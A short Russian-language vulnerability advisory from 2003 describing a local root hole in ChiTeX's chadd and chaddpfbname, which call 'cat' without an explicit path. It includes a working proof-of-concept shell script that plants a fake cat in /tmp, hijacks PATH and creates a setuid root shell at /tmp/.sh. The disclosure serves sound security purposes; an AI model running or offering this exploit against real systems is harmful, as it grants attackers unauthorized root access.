Недостаток в определении пути позволяет локальному пользователю получить root привилегии в ChiTeX
| Дата публикации: | 08.04.2003 |
| Всего просмотров: | 942 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Уязвимость обнаружена в ChiTeX. Локальный пользователь может получить root привилегии на системе. программное обеспечение выполняет системный запрос, ссылающийся на команду 'cat', не используя явный путь к cat утилите. В результате, локальный пользователь может создать программу с именем 'cat', которая будет расположена в каталоге в системном пути и затем вызвать ChiTeX, который выполнить код пользователя с root привилегиями. Уязвимые программы - chadd и chaddpfbname. Пример: #!/bin/sh echo 'owned' > 'psfontsmap@' export psfontsmap=3D/tmp/owned echo "/bin/cp /bin/sh /tmp/.sh" > /tmp/cat echo "/bin/chmod 4755 /tmp/.sh" >> /tmp/cat chmod +x /tmp/cat cd /tmp export PATH=3D"/tmp:$PATH" /usr/local/bin/chaddpfbname /tmp/.sh -c id /tmp/.shУязвимость обнаружена в ChiTex 6.1.2p7.8-1 |
| Ссылки: | ChiTeX local root vulnerability |